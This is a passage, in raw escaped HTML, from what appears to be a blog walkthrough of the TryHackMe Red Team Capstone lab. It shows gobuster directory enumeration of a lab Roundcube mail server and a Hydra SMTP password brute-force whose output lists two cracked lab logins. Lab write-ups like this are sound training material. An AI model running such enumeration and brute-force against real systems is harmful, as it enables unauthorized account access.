cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"\u250c\u2500\u2500(ishsome\u327fkali)-[~\/THM\/RedTeam-Capstone]\n\u2514\u2500$ gobuster dir -u http:\/\/mail.thereserve.loc -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/mail.thereserve.loc\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              php\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/index.php            (Status: 200) [Size: 5345]\n\/skins                (Status: 301) [Size: 156] [--&gt; http:\/\/mail.thereserve.loc\/skins\/]\n\/plugins              (Status: 301) [Size: 158] [--&gt; http:\/\/mail.thereserve.loc\/plugins\/]\n\/program              (Status: 301) [Size: 158] [--&gt; http:\/\/mail.thereserve.loc\/program\/]\n\/Index.php            (Status: 200) [Size: 5345]\n\/vendor               (Status: 301) [Size: 157] [--&gt; http:\/\/mail.thereserve.loc\/vendor\/]\" style=\"color:#babed8;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-ocean\" style=\"background-color: #0F111A\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #FFCB6B\">\u250c\u2500\u2500(ishsome\u327fkali<\/span><span style=\"color: #BABED8\">)-<\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">~\/THM\/RedTeam-Capstone<\/span><span style=\"color: #89DDFF\">]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">\u2514\u2500$<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">gobuster<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">dir<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-u<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">http:\/\/mail.thereserve.loc<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-w<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">\/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-x<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">php<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">===============================================================<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Gobuster<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">v3.6<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">by<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">OJ<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Reeves<\/span><span style=\"color: #BABED8\"> (@TheColonial) <\/span><span style=\"color: #89DDFF\">&amp;<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">Christian<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Mehlmauer<\/span><span style=\"color: #BABED8\"> (@firefart)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">===============================================================<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">+<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\"> Url:                     http:\/\/mail.thereserve.loc<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">+<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\"> Method:                  GET<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">+<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\"> Threads:                 10<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">+<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\"> Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">+<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\"> Negative Status codes:   404<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">+<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\"> User Agent:              gobuster\/3.6<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">+<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\"> Extensions:              php<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">+<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\"> Timeout:                 10s<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">===============================================================<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Starting<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">gobuster<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">in<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">directory<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">enumeration<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">mode<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">===============================================================<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">\/index.php<\/span><span style=\"color: #BABED8\">            (Status: <\/span><span style=\"color: #F78C6C\">200<\/span><span style=\"color: #BABED8\">) <\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">Size: <\/span><span style=\"color: #F78C6C\">5345<\/span><span style=\"color: #89DDFF\">]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">\/skins<\/span><span style=\"color: #BABED8\">                (Status: <\/span><span style=\"color: #F78C6C\">301<\/span><span style=\"color: #BABED8\">) <\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">Size: <\/span><span style=\"color: #F78C6C\">156<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">--<\/span><span style=\"color: #89DDFF\">&gt;<\/span><span style=\"color: #BABED8\"> http:\/\/mail.thereserve.loc\/skins\/<\/span><span style=\"color: #89DDFF\">]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">\/plugins<\/span><span style=\"color: #BABED8\">              (Status: <\/span><span style=\"color: #F78C6C\">301<\/span><span style=\"color: #BABED8\">) <\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">Size: <\/span><span style=\"color: #F78C6C\">158<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">--<\/span><span style=\"color: #89DDFF\">&gt;<\/span><span style=\"color: #BABED8\"> http:\/\/mail.thereserve.loc\/plugins\/<\/span><span style=\"color: #89DDFF\">]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">\/program<\/span><span style=\"color: #BABED8\">              (Status: <\/span><span style=\"color: #F78C6C\">301<\/span><span style=\"color: #BABED8\">) <\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">Size: <\/span><span style=\"color: #F78C6C\">158<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">--<\/span><span style=\"color: #89DDFF\">&gt;<\/span><span style=\"color: #BABED8\"> http:\/\/mail.thereserve.loc\/program\/<\/span><span style=\"color: #89DDFF\">]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">\/Index.php<\/span><span style=\"color: #BABED8\">            (Status: <\/span><span style=\"color: #F78C6C\">200<\/span><span style=\"color: #BABED8\">) <\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">Size: <\/span><span style=\"color: #F78C6C\">5345<\/span><span style=\"color: #89DDFF\">]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">\/vendor<\/span><span style=\"color: #BABED8\">               (Status: <\/span><span style=\"color: #F78C6C\">301<\/span><span style=\"color: #BABED8\">) <\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">Size: <\/span><span style=\"color: #F78C6C\">157<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">--<\/span><span style=\"color: #89DDFF\">&gt;<\/span><span style=\"color: #BABED8\"> http:\/\/mail.thereserve.loc\/vendor\/<\/span><span style=\"color: #89DDFF\">]<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:9px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h5 class=\"wp-block-heading\" id=\"15-roundcube-webmail-\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">RoundCube Webmail <\/mark><\/h5>\n\n\n\n<p><a href=\"https:\/\/github.com\/roundcube\/roundcubemail\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">Roundcube Webmail<\/a> is a browser-based multilingual IMAP client with an application-like user interface. It provides the full functionality you expect from an email client, including MIME support, address book, folder management, message searching, and spell checking. Roundcube Webmail is written in PHP and requires the MySQL, PostgreSQL, or SQLite database. With its plugin API, it is easily extendable and the user interface is fully customizable using skins.<\/p>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b09105a3a&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b09105a3a\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"515\" data-attachment-id=\"461\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240206101226\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206101226.png?fit=1286%2C647&amp;ssl=1\" data-orig-size=\"1286,647\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240206101226\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206101226.png?fit=1024%2C515&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206101226.png?resize=1024%2C515&#038;ssl=1\" alt=\"\" class=\"wp-image-461\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206101226.png?resize=1024%2C515&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206101226.png?resize=300%2C151&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206101226.png?resize=768%2C386&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206101226.png?w=1286&amp;ssl=1 1286w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:9px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>We only have potential usernames for the login so we cannot login. We can try to brute-force the SMTP port using <code>Hydra<\/code> and might be able to find matching passwords for the users.<\/p>\n\n\n\n<div style=\"height:12px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"16-smtp-brute-force-\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">SMTP Brute-Force<\/mark><\/h4>\n\n\n\n<p>For this brute-force attack, we will use the password list provided to us under lab resources.<\/p>\n\n\n\n<div style=\"height:9px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#0F111A\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"\u250c\u2500\u2500(ishsome\u327fkali)-[~\/THM\/RedTeam-Capstone]\n\u2514\u2500$ hydra -L emails.txt -P passwords.lst mail.thereserve.loc smtp\nHydra v9.5 (c) 2023 by van Hauser\/THC &amp; David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\n\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) starting at 2024-02-06 11:13:28\n[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!\n[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, .\/hydra.restore\n[DATA] max 16 tasks per 1 server, overall 16 tasks, 15120 login tries (l:18\/p:840), ~945 tries per task\n[DATA] attacking smtp:\/\/mail.thereserve.loc:25\/\n[STATUS] 1004.00 tries\/min, 1004 tries in 00:01h, 14116 to do in 00:15h, 16 active\n[STATUS] 1023.33 tries\/min, 3070 tries in 00:03h, 12050 to do in 00:12h, 16 active\n[STATUS] 1034.14 tries\/min, 7239 tries in 00:07h, 7881 to do in 00:08h, 16 active\n[25][smtp] host: mail.thereserve.loc   login: laura.wood@corp.thereserve.loc   password: Password1@\n[25][smtp] host: mail.thereserve.loc   login: mohammad.ahmed@corp.thereserve.loc   password: Password1!\n[STATUS] 1114.75 tries\/min, 13377 tries in 00:12h, 1743 to do in 00:02h, 16 active\n[STATUS] 1107.85 tries\/min, 14402 tries in 00:13h, 718 to do in 00:01h, 16 active\n1 of 1 target successfully completed, 2 valid passwords found\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) finished at 2024-02-06 11:27:17\" style=\"color:#babed8;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-ocean\" style=\"background-color: #0F111A\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #FFCB6B\">\u250c\u2500\u2500(ishsome\u327fkali<\/span><span style=\"color: #BABED8\">)-<\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">~\/THM\/RedTeam-Capstone<\/span><span style=\"color: #89DDFF\">]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">\u2514\u2500$<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">hydra<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-L<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">emails.txt<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-P<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">passwords.lst<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">mail.thereserve.loc<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">smtp<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Hydra<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">v9.5<\/span><span style=\"color: #BABED8\"> (c) 2023 by van Hauser\/THC <\/span><span style=\"color: #89DDFF\">&amp;<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">David<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Maciejak<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Please<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">do<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">not<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">use<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">in<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">military<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">or<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">secret<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">service<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">organizations,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">or<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">for<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">illegal<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">purposes<\/span><span style=\"color: #BABED8\"> (this <\/span><span style=\"color: #C3E88D\">is<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">non-binding,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">these<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #BABED8\">***<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">ignore<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">laws<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">and<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">ethics<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">anyway<\/span><span style=\"color: #BABED8\">).<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Hydra<\/span><span style=\"color: #BABED8\"> (https:\/\/github.com\/vanhauser-thc\/thc-hydra) starting at 2024-02-06 11:13:28<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">INFO<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\"> several providers have implemented cracking protection, check with a small wordlist first - and stay legal<\/span><span style=\"color: #89DDFF\">!<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">WARNING<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\"> Restorefile <\/span><span style=\"color: #89DDFF\">(<\/span><span style=\"color: #FFCB6B\">you<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">have<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">10<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">seconds<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">to<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">abort...<\/span><span style=\"color: #BABED8\"> (use <\/span><span style=\"color: #C3E88D\">option<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-I<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">to<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">skip<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">waiting<\/span><span style=\"color: #89DDFF\">)<\/span><span style=\"color: #BABED8\">) from a previous session found, to prevent overwriting, .\/hydra.restore<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">DATA<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\"> max 16 tasks per 1 server, overall 16 tasks, 15120 login tries <\/span><span style=\"color: #89DDFF\">(<\/span><span style=\"color: #FFCB6B\">l:18\/p:840<\/span><span style=\"color: #89DDFF\">)<\/span><span style=\"color: #BABED8\">, <\/span><span style=\"color: #89DDFF\">~<\/span><span style=\"color: #BABED8\">945 tries per task<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">DATA<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\"> attacking smtp:\/\/mail.thereserve.loc:25\/<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">STATUS<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\"> 1004.00 tries\/min, 1004 tries <\/span><span style=\"color: #89DDFF; font-style: italic\">in<\/span><span style=\"color: #BABED8\"> 00:01h, 14116 to <\/span><span style=\"color: #89DDFF; font-style: italic\">do<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF; font-style: italic\">in<\/span><span style=\"color: #BABED8\"> 00:15h, 16 active<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">STATUS<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\"> 1023.33 tries\/min, 3070 tries <\/span><span style=\"color: #89DDFF; font-style: italic\">in<\/span><span style=\"color: #BABED8\"> 00:03h, 12050 to <\/span><span style=\"color: #89DDFF; font-style: italic\">do<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF; font-style: italic\">in<\/span><span style=\"color: #BABED8\"> 00:12h, 16 active<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">STATUS<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\"> 1034.14 tries\/min, 7239 tries <\/span><span style=\"color: #89DDFF; font-style: italic\">in<\/span><span style=\"color: #BABED8\"> 00:07h, 7881 to <\/span><span style=\"color: #89DDFF; font-style: italic\">do<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF; font-style: italic\">in<\/span><span style=\"color: #BABED8\"> 00:08h, 16 active<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #F78C6C\">25<\/span><span style=\"color: #89DDFF\">][<\/span><span style=\"color: #BABED8\">smtp<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\"> host: mail.thereserve.loc   login: laura.wood@corp.thereserve.loc   password: Password1@<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #F78C6C\">25<\/span><span style=\"color: #89DDFF\">][<\/span><span style=\"color: #BABED8\">smtp<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\"> host: mail.thereserve.loc   login: mohammad.ahmed@corp.thereserve.loc   password: Password1<\/span><span style=\"color: #89DDFF\">!<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">STATUS<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\"> 1114.75 tries\/min, 13377 tries <\/span><span style=\"color: #89DDFF; font-style: italic\">in<\/span><span style=\"color: #BABED8\"> 00:12h, 1743 to <\/span><span style=\"color: #89DDFF; font-style: italic\">do<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF; font-style: italic\">in<\/span><span style=\"color: #BABED8\"> 00:02h, 16 active<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">STATUS<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\"> 1107.85 tries\/min, 14402 tries <\/span><span style=\"color: #89DDFF; font-style: italic\">in<\/span><span style=\"color: #BABED8\"> 00:13h, 718 to <\/span><span style=\"color: #89DDFF; font-style: italic\">do<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF; font-style: italic\">in<\/span><span style=\"color: #BABED8\"> 00:01h, 16 active<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">1<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">of<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">1<\/span><span style=\"color: #BABED8\"> <\/span><span 